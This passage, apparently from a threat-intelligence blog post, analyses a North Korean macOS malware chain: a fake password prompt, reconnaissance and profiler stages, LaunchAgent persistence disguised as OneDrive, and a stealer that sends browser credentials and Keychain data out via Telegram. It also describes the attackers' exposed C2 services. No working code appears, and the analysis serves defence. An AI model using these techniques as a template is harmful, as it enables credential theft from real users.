English. It will fail three times in a row, <strong>even if you enter the correct password</strong>, complete with window shaking and all.</p><p>Once it has your credentials, it will begin staging <strong>basic reconnaissance</strong> data from your system, such as CPU ID, user, hostname, and <strong>installed applications</strong>.</p><p>It will keep running in the background, <strong>downloading the next stage</strong>, which could be <em>D1YrHRTg.bin</em>, <em>D1ozPVNG.bin</em> or <em>D1yCPUyk.bin </em>(they are, in fact, the same file). This implant acts as a profiler, enumerating information from <strong>browser extensions</strong>, including <strong>Chrome</strong>, <strong>Firefox</strong>, and <strong>Safari</strong>, network configuration and running processes. It does not exfiltrate files at this stage; <strong>it only sends a text file</strong> containing host information, preparing the ground for <strong>later exfiltration</strong>.</p><p>In an unexpected, almost heartwarming gesture, the <strong>Chollimas</strong> allowed this binary to display <strong>a helpful usage message</strong> when run without arguments.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BriS!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07f034a4-a850-4126-80bd-dd48f64e3ab3_2416x1666.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!BriS!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07f034a4-a850-4126-80bd-dd48f64e3ab3_2416x1666.png 424w, https://substackcdn.com/image/fetch/$s_!BriS!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07f034a4-a850-4126-80bd-dd48f64e3ab3_2416x1666.png 848w, https://substackcdn.com/image/fetch/$s_!BriS!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07f034a4-a850-4126-80bd-dd48f64e3ab3_2416x1666.png 1272w, https://substackcdn.com/image/fetch/$s_!BriS!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07f034a4-a850-4126-80bd-dd48f64e3ab3_2416x1666.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BriS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07f034a4-a850-4126-80bd-dd48f64e3ab3_2416x1666.png" width="1456" height="1004" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/07f034a4-a850-4126-80bd-dd48f64e3ab3_2416x1666.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4cc0e244-6681-4f6f-b8df-f788e6936254_2416x1666.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1004,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:3357152,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4cc0e244-6681-4f6f-b8df-f788e6936254_2416x1666.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!BriS!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07f034a4-a850-4126-80bd-dd48f64e3ab3_2416x1666.png 424w, https://substackcdn.com/image/fetch/$s_!BriS!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07f034a4-a850-4126-80bd-dd48f64e3ab3_2416x1666.png 848w, https://substackcdn.com/image/fetch/$s_!BriS!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07f034a4-a850-4126-80bd-dd48f64e3ab3_2416x1666.png 1272w, https://substackcdn.com/image/fetch/$s_!BriS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F07f034a4-a850-4126-80bd-dd48f64e3ab3_2416x1666.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Thanks, kind Chollima Dev.</figcaption></figure></div><p>The interesting part is that this stage <strong>loops indefinitely</strong>, sending <strong>the same host information</strong> to its C2 server via cURL over and over again, often starving the system of resources and making its presence quite obvious. But the <strong>most interesting</strong> <strong>part</strong> is that <strong>this C2 endpoint has no authentication</strong>&#8230; we&#8217;ll get there in a moment.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!AuLv!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!AuLv!,w_424,c_limit,f_webp,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif 424w, https://substackcdn.com/image/fetch/$s_!AuLv!,w_848,c_limit,f_webp,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif 848w, https://substackcdn.com/image/fetch/$s_!AuLv!,w_1272,c_limit,f_webp,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif 1272w, https://substackcdn.com/image/fetch/$s_!AuLv!,w_1456,c_limit,f_webp,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!AuLv!,w_1456,c_limit,f_auto,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif" width="220" height="248.75" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:398,&quot;width&quot;:352,&quot;resizeWidth&quot;:220,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;a small white chihuahua dog is looking at the camera with a serious look on its face .&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="a small white chihuahua dog is looking at the camera with a serious look on its face ." title="a small white chihuahua dog is looking at the camera with a serious look on its face ." srcset="https://substackcdn.com/image/fetch/$s_!AuLv!,w_424,c_limit,f_auto,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif 424w, https://substackcdn.com/image/fetch/$s_!AuLv!,w_848,c_limit,f_auto,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif 848w, https://substackcdn.com/image/fetch/$s_!AuLv!,w_1272,c_limit,f_auto,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif 1272w, https://substackcdn.com/image/fetch/$s_!AuLv!,w_1456,c_limit,f_auto,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The next stage is <em>minst2.bin</em>, which <strong>establishes persistence</strong> on the system by downloading an &#8220;<em>Antivirus Service</em>&#8221; package from a server provided as an argument. This <strong>fake antivirus</strong> package contains a binary named remotely as <em>localencode</em>, but saved locally as <em>OneDrive</em>.</p><p>It then creates a <strong>LaunchAgent</strong>, roughly the <strong>macOS</strong> equivalent of <strong>Windows Services</strong>, to maintain persistence by executing <em>OneDrive</em>, which in turn instantiates the previous components on startup. It is also responsible for <strong>cleaning up traces</strong> and leftovers from the exfiltration process.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!4lk-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c9af6c7-29fc-4f04-9c15-f82784c23ec7_2416x1666.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!4lk-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c9af6c7-29fc-4f04-9c15-f82784c23ec7_2416x1666.png 424w, https://substackcdn.com/image/fetch/$s_!4lk-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c9af6c7-29fc-4f04-9c15-f82784c23ec7_2416x1666.png 848w, https://substackcdn.com/image/fetch/$s_!4lk-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c9af6c7-29fc-4f04-9c15-f82784c23ec7_2416x1666.png 1272w, https://substackcdn.com/image/fetch/$s_!4lk-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c9af6c7-29fc-4f04-9c15-f82784c23ec7_2416x1666.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!4lk-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c9af6c7-29fc-4f04-9c15-f82784c23ec7_2416x1666.png" width="1456" height="1004" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5c9af6c7-29fc-4f04-9c15-f82784c23ec7_2416x1666.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9bf98287-6fd8-4746-83e5-5e3d608e69da_2416x1666.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1004,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:3434583,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9bf98287-6fd8-4746-83e5-5e3d608e69da_2416x1666.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!4lk-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c9af6c7-29fc-4f04-9c15-f82784c23ec7_2416x1666.png 424w, https://substackcdn.com/image/fetch/$s_!4lk-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c9af6c7-29fc-4f04-9c15-f82784c23ec7_2416x1666.png 848w, https://substackcdn.com/image/fetch/$s_!4lk-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c9af6c7-29fc-4f04-9c15-f82784c23ec7_2416x1666.png 1272w, https://substackcdn.com/image/fetch/$s_!4lk-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5c9af6c7-29fc-4f04-9c15-f82784c23ec7_2416x1666.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">A LauncherAgent developed by SupremeLeader LLC</figcaption></figure></div><p>But it doesn&#8217;t end there. A payload called <em>macrasv2</em> is downloaded next, acting as <strong> stealer</strong> targeting browser extension data, stored browser <strong>credentials</strong> and <strong>cookies</strong>, <strong>macOS</strong> <strong>Keychain</strong> entries, and other files of interest, and <strong>exfiltrating them via Telegram </strong>in an interesting and i<strong>nsecure way</strong>.</p><p>But more on that later!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!AuLv!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!AuLv!,w_424,c_limit,f_webp,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif 424w, https://substackcdn.com/image/fetch/$s_!AuLv!,w_848,c_limit,f_webp,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif 848w, https://substackcdn.com/image/fetch/$s_!AuLv!,w_1272,c_limit,f_webp,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif 1272w, https://substackcdn.com/image/fetch/$s_!AuLv!,w_1456,c_limit,f_webp,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!AuLv!,w_1456,c_limit,f_auto,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif" width="220" height="248.75" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:398,&quot;width&quot;:352,&quot;resizeWidth&quot;:220,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;a small white chihuahua dog is looking at the camera with a serious look on its face .&quot;,&quot;title&quot;:&quot;a small white chihuahua dog is looking at the camera with a serious look on its face .&quot;,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="a small white chihuahua dog is looking at the camera with a serious look on its face ." title="a small white chihuahua dog is looking at the camera with a serious look on its face ." srcset="https://substackcdn.com/image/fetch/$s_!AuLv!,w_424,c_limit,f_auto,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif 424w, https://substackcdn.com/image/fetch/$s_!AuLv!,w_848,c_limit,f_auto,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif 848w, https://substackcdn.com/image/fetch/$s_!AuLv!,w_1272,c_limit,f_auto,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif 1272w, https://substackcdn.com/image/fetch/$s_!AuLv!,w_1456,c_limit,f_auto,q_auto:good,fl_lossy/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe5f4ab5c-90db-4ae3-8bfb-db1b397dd1c0_352x398.gif 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>I&#8217;d say this new album goes back to its roots&#8230; or, if I may repeat myself, <em>old habits die hard</em>: <strong>Telegram</strong> account takeovers, <strong>fake meetings</strong>, <strong>ClickFix</strong>, Telegram once again as an exfiltration channel, <strong>and insecure C2 channels</strong>. </p><p>About that&#8230;</p><div><hr></div><h2>Taming a Chollima (once again)</h2><p>Their servers host multiple open services, including <strong>fake ones</strong> listening on well-known ports such as <strong>110 (POP3)</strong>. Notably, <strong>Windows Remote Desktop Protocol</strong> (RDP), <strong>WinRM</strong> (Windows Remote Management), and the <strong>Chrome Remote Desktop</strong> dashboard were found to be publicly accessible.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!flDt!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4f79aff-03be-4717-abe3-67be45aeb4de_3138x2190.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!flDt!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4f79aff-03be-4717-abe3-67be45aeb4de_3138x2190.png 424w, https://substackcdn.com/image/fetch/$s_!flDt!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4f79aff-03be-4717-abe3-67be45aeb4de_3138x2190.png 848w, https://substackcdn.com/image/fetch/$s_!flDt!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4f79aff-03be-4717-abe3-67be45aeb4de_3138x2190.png 1272w, https://substackcdn.com/image/fetch/$s_!flDt!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4f79aff-03be-4717-abe3-67be45aeb4de_3138x2190.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!flDt!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4f79aff-03be-4717-abe3-67be45aeb4de_3138x2190.png" width="494" height="344.76099426386236" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c4f79aff-03be-4717-abe3-67be45aeb4de_3138x2190.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7a3f72db-3515-4ed3-9b00-8714133156f4_3138x2190.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:2190,&quot;width&quot;:3138,&quot;resizeWidth&quot;:494,&quot;bytes&quot;:2002407,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7a3f72db-3515-4ed3-9b00-8714133156f4_3138x2190.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!flDt!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4f79aff-03be-4717-abe3-67be45aeb4de_3138x2190.png 424w, https://substackcdn.com/image/fetch/$s_!flDt!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4f79aff-03be-4717-abe3-67be45aeb4de_3138x2190.png 848w, https://substackcdn.com/image/fetch/$s_!flDt!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4f79aff-03be-4717-abe3-67be45aeb4de_3138x2190.png 1272w, https://substackcdn.com/image/fetch/$s_!flDt!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc4f79aff-03be-4717-abe3-67be45aeb4de_3138x2190.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" 